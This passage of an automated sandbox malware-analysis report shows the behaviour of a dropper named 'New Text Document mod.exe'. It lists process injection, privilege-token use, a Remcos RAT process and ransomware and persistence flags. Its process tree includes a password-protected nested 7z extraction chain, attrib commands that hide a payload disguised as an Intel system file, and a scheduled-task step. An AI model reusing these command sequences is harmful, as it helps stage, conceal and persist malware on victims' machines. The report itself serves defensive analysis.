Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Runs .reg file with regedit

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\ProgramData\Remcos\remcos.exe N/A
N/A N/A \??\c:\program files (x86)\internet explorer\iexplore.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\a\client.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4760 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\random.exe
PID 4760 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\random.exe
PID 4760 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\random.exe
PID 4760 wrote to memory of 4704 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\client.exe
PID 4760 wrote to memory of 4704 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\client.exe
PID 4708 wrote to memory of 4668 N/A C:\Users\Admin\AppData\Local\Temp\a\random.exe C:\Windows\system32\cmd.exe
PID 4708 wrote to memory of 4668 N/A C:\Users\Admin\AppData\Local\Temp\a\random.exe C:\Windows\system32\cmd.exe
PID 4668 wrote to memory of 3724 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 4668 wrote to memory of 3724 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 4668 wrote to memory of 3824 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 4668 wrote to memory of 3824 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 4668 wrote to memory of 960 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 4668 wrote to memory of 960 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 4668 wrote to memory of 4524 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 4668 wrote to memory of 4524 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 4668 wrote to memory of 3580 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 4668 wrote to memory of 3580 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 4668 wrote to memory of 1116 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 4668 wrote to memory of 1116 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 4760 wrote to memory of 3212 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\l4.exe
PID 4760 wrote to memory of 3212 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\l4.exe
PID 4668 wrote to memory of 1496 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 4668 wrote to memory of 1496 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 4668 wrote to memory of 4472 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 4668 wrote to memory of 4472 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 4668 wrote to memory of 1732 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 4668 wrote to memory of 1732 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 4668 wrote to memory of 1992 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4668 wrote to memory of 1992 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4668 wrote to memory of 1996 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\in.exe
PID 4668 wrote to memory of 1996 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\in.exe
PID 1996 wrote to memory of 3220 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\SYSTEM32\attrib.exe
PID 1996 wrote to memory of 3220 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\SYSTEM32\attrib.exe
PID 1996 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\SYSTEM32\attrib.exe
PID 1996 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\SYSTEM32\attrib.exe
PID 1996 wrote to memory of 872 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\SYSTEM32\schtasks.exe
PID 1996 wrote to memory of 872 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\SYSTEM32\schtasks.exe
PID 1996 wrote to memory of 3128 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1996 wrote to memory of 3128 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3212 wrote to memory of 1664 N/A C:\Users\Admin\AppData\Local\Temp\a\l4.exe C:\Users\Admin\AppData\Local\Temp\onefile_3212_133785012146184588\l4.exe
PID 3212 wrote to memory of 1664 N/A C:\Users\Admin\AppData\Local\Temp\a\l4.exe C:\Users\Admin\AppData\Local\Temp\onefile_3212_133785012146184588\l4.exe
PID 3128 wrote to memory of 4452 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\PING.EXE
PID 3128 wrote to memory of 4452 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\PING.EXE
PID 4760 wrote to memory of 4784 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe
PID 4760 wrote to memory of 4784 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe
PID 4760 wrote to memory of 4784 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe
PID 4760 wrote to memory of 3724 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe
PID 4760 wrote to memory of 3724 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe
PID 4760 wrote to memory of 3724 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe
PID 4760 wrote to memory of 4416 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe
PID 4760 wrote to memory of 4416 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe
PID 4760 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe
PID 4760 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe
PID 4760 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe
PID 4416 wrote to memory of 988 N/A C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe C:\Program Files\Windows Media Player\graph\graph.exe
PID 4416 wrote to memory of 988 N/A C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe C:\Program Files\Windows Media Player\graph\graph.exe
PID 4760 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe
PID 4760 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe
PID 4760 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe
PID 4760 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe
PID 4760 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe
PID 4760 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe
PID 4760 wrote to memory of 4688 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe
PID 4760 wrote to memory of 4688 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe

"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\a\random.exe

"C:\Users\Admin\AppData\Local\Temp\a\random.exe"

C:\Users\Admin\AppData\Local\Temp\a\client.exe

"C:\Users\Admin\AppData\Local\Temp\a\client.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\mode.com

mode 65,10

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e file.zip -p24291711423417250691697322505 -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_7.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_6.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_5.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_4.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\a\l4.exe

"C:\Users\Admin\AppData\Local\Temp\a\l4.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_3.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_2.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_1.zip -oextracted

C:\Windows\system32\attrib.exe

attrib +H "in.exe"

C:\Users\Admin\AppData\Local\Temp\main\in.exe

"in.exe"

C:\Windows\SYSTEM32\attrib.exe

attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\SYSTEM32\attrib.exe

attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\SYSTEM32\schtasks.exe

